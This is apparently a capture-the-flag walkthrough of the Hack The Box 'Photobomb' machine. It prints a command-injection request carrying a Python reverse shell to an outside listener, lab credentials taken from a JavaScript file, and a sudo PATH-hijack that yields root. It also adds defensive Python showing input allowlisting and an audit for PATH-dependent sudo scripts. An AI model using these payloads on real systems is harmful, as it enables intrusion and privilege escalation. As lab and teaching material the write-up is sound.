Board URL: https://forum.hackthebox.com/t/official-photobomb-discussion/265724
Box URL: https://app.hackthebox.com/machines/Photobomb
Created: November 11, 2022 10:00 PM
Host: photobomb.htb
IP: 10.10.11.182
Initial Scan
Running an nmap scan shows only ports 22 and 80 open.
```text
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-11 21:57 WET
Nmap scan report for 10.10.11.182
Host is up (0.043s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_  256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.51 seconds
```
Let's also try to find subdomains and files or folders using gobuster.
Using the hints from the forum, one says that I should check the JS file.
```javascript
function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
  }
}
window.onload = init;
```
After logging in I have a set of images that I can download. I capture one of the download requests and modify it in Burp Suite in order to get a reverse shell: the filetype parameter is not sanitised, so a command appended after a `;` is executed on the server.
```http
POST /printer HTTP/1.1
Host: photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg%3Bpython3%20-c%20%27import%20os%2Cpty%2Csocket%3Bs%3Dsocket.socket%28%29%3Bs.connect%28%28%2210.10.14.165%22%2C9001%29%29%3B%5Bos.dup2%28s.fileno%28%29%2Cf%29for%20f%20in%280%2C1%2C2%29%5D%3Bpty.spawn%28%22sh%22%29%27&dimensions=3000x2000
```
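The request above works because the filetype value reaches a shell unchanged. The following is an added example of my own, not code from the box's application (its server side is not shown on this page): it contrasts a handler that interpolates the three request parameters into a shell command line with one that allowlists each parameter and returns an argv list for subprocess with shell=False. The convert invocation, the output path layout and the allowlists are assumptions, and the injected filetype value is a constructed stand-in with a harmless stub in place of the real payload.

```python
from __future__ import annotations

import re

# Constructed sample values in the shape of the request parameters on the page.
# The payload body is replaced by a harmless stub; only the ';' separator matters here.
SAFE_PHOTO = "voicu-apostol-MWER49YaD-M-unsplash.jpg"
INJECTED_FILETYPE = "jpg;python3 -c 'import os'"

# Allowlists for each parameter (assumed policy, not the box's own rules).
ALLOWED_FILETYPES = {"jpg", "png"}
PHOTO_RE = re.compile(r"^[A-Za-z0-9._-]+\.(?:jpg|png)$")
DIMENSIONS_RE = re.compile(r"^\d{1,5}x\d{1,5}$")


def vulnerable_command(photo: str, filetype: str, dimensions: str) -> str:
    """Build the command line the way an unsafe handler might: by interpolating
    request parameters into a string that is then handed to /bin/sh.  Whatever
    follows a ';' in filetype is parsed by the shell as a second command."""
    return f"convert source_images/{photo} -resize {dimensions} output/{photo}.{filetype}"


def hardened_command(photo: str, filetype: str, dimensions: str) -> list[str]:
    """Validate every parameter against an allowlist and return an argv list
    for subprocess.run(argv, shell=False), so no shell ever parses user input."""
    if not PHOTO_RE.fullmatch(photo):
        raise ValueError("photo must be a plain filename ending in .jpg or .png")
    if filetype not in ALLOWED_FILETYPES:
        raise ValueError(f"filetype must be one of {sorted(ALLOWED_FILETYPES)}")
    if not DIMENSIONS_RE.fullmatch(dimensions):
        raise ValueError("dimensions must look like WIDTHxHEIGHT")
    base = photo.rsplit(".", 1)[0]
    return ["convert", f"source_images/{photo}", "-resize", dimensions,
            f"output/{base}_{dimensions}.{filetype}"]


def handle_download(params: dict[str, str]) -> tuple[str, object]:
    """Request-handler shape: reject bad input with a reason before anything
    is executed, otherwise return the argv the caller would pass to subprocess."""
    try:
        argv = hardened_command(params["photo"], params["filetype"], params["dimensions"])
    except (KeyError, ValueError) as exc:
        return ("rejected", str(exc))
    return ("ok", argv)


if __name__ == "__main__":
    print(vulnerable_command(SAFE_PHOTO, INJECTED_FILETYPE, "3000x2000"))
    print(handle_download({"photo": SAFE_PHOTO, "filetype": INJECTED_FILETYPE, "dimensions": "3000x2000"}))
    print(handle_download({"photo": SAFE_PHOTO, "filetype": "jpg", "dimensions": "3000x2000"}))
```

The allowlist is the primary control; passing an argv list with shell=False is the second layer, because even a value that slipped past validation would then be a literal argument to convert rather than text for a shell to split on `;`.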
The user flag is in the home folder of the wizard user. After getting the user flag I run sudo -l to see what I can run as root.
```text
wizard@photobomb:~/photobomb$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
wizard@photobomb:~/photobomb$ cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
```
The last line is interesting: it calls find by bare name rather than by absolute path, and the sudo rule carries the SETENV tag, so the caller can supply their own PATH. This can be exploited by creating an executable called find in another directory, prepending that directory to PATH and calling the script:
```text
wizard@photobomb:~/photobomb$ echo "/bin/bash" > /tmp/find
wizard@photobomb:~/photobomb$ chmod +x /tmp/find
wizard@photobomb:~/photobomb$ sudo PATH=/tmp:$PATH /opt/cleanup.sh
```
This gives me access to the root folder and flag. A nice box, with some help for the first part.
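As an added example of how a defender would catch this privilege-escalation path before an attacker does (my own code, not anything from the box), the script below audits a sudo-runnable shell script for commands resolved through PATH, including the target of find's -exec, and checks the sudoers entry for the SETENV tag. It runs over the cleanup.sh and sudo -l output quoted above, and over a constructed hardened pair: a script that pins PATH and calls find and chown by absolute path, and a sudoers rule without SETENV. The hardened variants and the builtin/keyword lists are assumptions, and the parser is deliberately line-oriented rather than a full bash grammar.

```python
from __future__ import annotations

import re
import shlex

# The cleanup script and the sudo rule, copied from the sudo -l output on the page.
CLEANUP_SH = """#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \\;
"""
SUDO_RULE = "(root) SETENV: NOPASSWD: /opt/cleanup.sh"

# Constructed hardened variants (assumptions, not the box's files): PATH is
# pinned inside the script, every external command is called by absolute path,
# and the sudoers entry drops the SETENV tag.
HARDENED_SH = """#!/bin/bash
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
cd /home/wizard/photobomb
/usr/bin/find source_images -type f -name '*.jpg' -exec /usr/bin/chown root:root {} \\;
"""
HARDENED_SUDO_RULE = "(root) NOPASSWD: /opt/cleanup.sh"

# Words bash handles itself, so they are never resolved through PATH.
KEYWORDS = {"if", "then", "else", "elif", "fi", "for", "while", "until", "do", "done", "!"}
BUILTINS = {".", "source", "cd", "[", "test", "export", "echo", "exit", "set", "unset", "read"}
SEPARATORS = {"&&", "||", ";", "|"}
EXEC_FLAGS = {"-exec", "-execdir", "-ok", "-okdir"}  # find(1) resolves the next word through PATH too
ASSIGNMENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def bare_commands(script: str) -> list[str]:
    """Return, in order of first appearance, each command the script invokes by
    bare name (resolved via PATH) rather than by absolute path."""
    found: list[str] = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            words = shlex.split(line)
        except ValueError:
            continue  # unbalanced quotes: out of scope for this check
        expect_command = True
        for word in words:
            if word in SEPARATORS or word in EXEC_FLAGS:
                expect_command = True
                continue
            if not expect_command:
                continue
            if word in KEYWORDS or ASSIGNMENT_RE.match(word):
                continue  # still looking for the actual command word
            expect_command = False
            if word in BUILTINS or word.startswith("/"):
                continue
            if word not in found:
                found.append(word)
    return found


def setenv_granted(sudo_rule: str) -> bool:
    """True when the sudoers entry carries the SETENV tag, which lets the caller
    hand environment variables such as PATH to the privileged command."""
    return "SETENV:" in sudo_rule.split()


def risk_report(script: str, sudo_rule: str) -> list[str]:
    """Combine both checks into readable findings; an empty list means neither
    PATH-dependent commands nor SETENV were found."""
    findings: list[str] = []
    bare = bare_commands(script)
    if bare:
        findings.append("commands resolved through PATH: " + ", ".join(bare))
    if setenv_granted(sudo_rule):
        findings.append("sudo rule grants SETENV, so the caller controls PATH")
    return findings


if __name__ == "__main__":
    for label, script, rule in (("as found", CLEANUP_SH, SUDO_RULE),
                                ("hardened", HARDENED_SH, HARDENED_SUDO_RULE)):
        print(label, risk_report(script, rule) or ["no findings"])
```

Either finding on its own is worth fixing: a bare command is harmless when the caller cannot influence PATH, and SETENV is harmless when the script never consults PATH, but the two together are exactly the condition the walkthrough abused.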